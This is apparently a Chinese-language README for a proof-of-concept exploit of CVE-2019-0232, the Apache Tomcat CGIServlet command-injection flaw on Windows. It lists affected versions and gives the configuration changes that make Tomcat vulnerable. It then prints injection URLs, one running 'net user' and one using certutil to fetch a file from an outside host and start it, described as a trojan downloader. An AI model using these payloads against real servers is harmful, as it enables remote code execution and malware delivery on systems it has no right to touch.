# CVE-2019-0232-EXP
测试环境为Win10 Home 1809,jre版本为18.3 (build 10.0.2+13),Tomcat版本为9.0.13。<br>
## 受影响Tomcat版本 <br>
★Apache Tomcat 9.0.0.M1 to 9.0.17<br>
★Apache Tomcat 8.5.0 to 8.5.39<br>
★Apache Tomcat 7.0.0 to 7.0.93<br>
## 配置 conf/web.xml <br>
```
<servlet>
<servlet-name>cgi</servlet-name>
<servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
<init-param>
<param-name>cgiPathPrefix</param-name>
<param-value>WEB-INF/cgi-bin</param-value>
</init-param>
<init-param>
<param-name>enableCmdLineArguments</param-name>
<param-value>true</param-value>
</init-param>
<init-param>
<param-name>executable</param-name>
<param-value></param-value>
</init-param>
<load-on-startup>5</load-on-startup>
</servlet>
```
配置Servlet Mappings:
```
<servlet-mapping>
<servlet-name>cgi</servlet-name>
<url-pattern>/cgi-bin/*</url-pattern>
</servlet-mapping>
```
## 配置 conf/context.xml <br>
添加 privileged="true"属性
```
<Context privileged="true">
<WatchedResource>WEB-INF/web.xml</WatchedResource>
<WatchedResource>WEB-INF/tomcat-web.xml</WatchedResource>
<WatchedResource>${catalina.base}/conf/web.xml</WatchedResource>
</Context>
```
最后在webapps/ROOT/WEB-INF文件夹下建立hello.bat空文件,里面可以什么都不用写。
启动Tomcat,打开浏览器,访问下面链接:
http://localhost:8080/cgi-bin/hello.bat?&C%3a%5cWindows%5cSystem32%5Cnet+user
## 漏洞利用场景 <br>
构造一个注入链接,实现一个图片(木马)下载器的功能:
http://localhost:8080/cgi-bin/hello.bat?&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3a%2f%2fb.hiphotos.baidu.com%2fimage%2fpic%2fitem%2f9825bc315c6034a8ef5250cec5134954082376c9.jpg+1.jpg+%26start+1.jpg
[4.0K] /data/pocs/bd35b1c0200627d3578de8b871b202ba94d1cb4b
├── [ 12K] 1.png
├── [ 12M] apache-tomcat-9.0.13.rar
├── [4.0K] conf
│ ├── [1.4K] context.xml
│ └── [166K] web.xml
├── [2.0K] README.md
└── [674K] 图片下载器演示.gif
1 directory, 6 files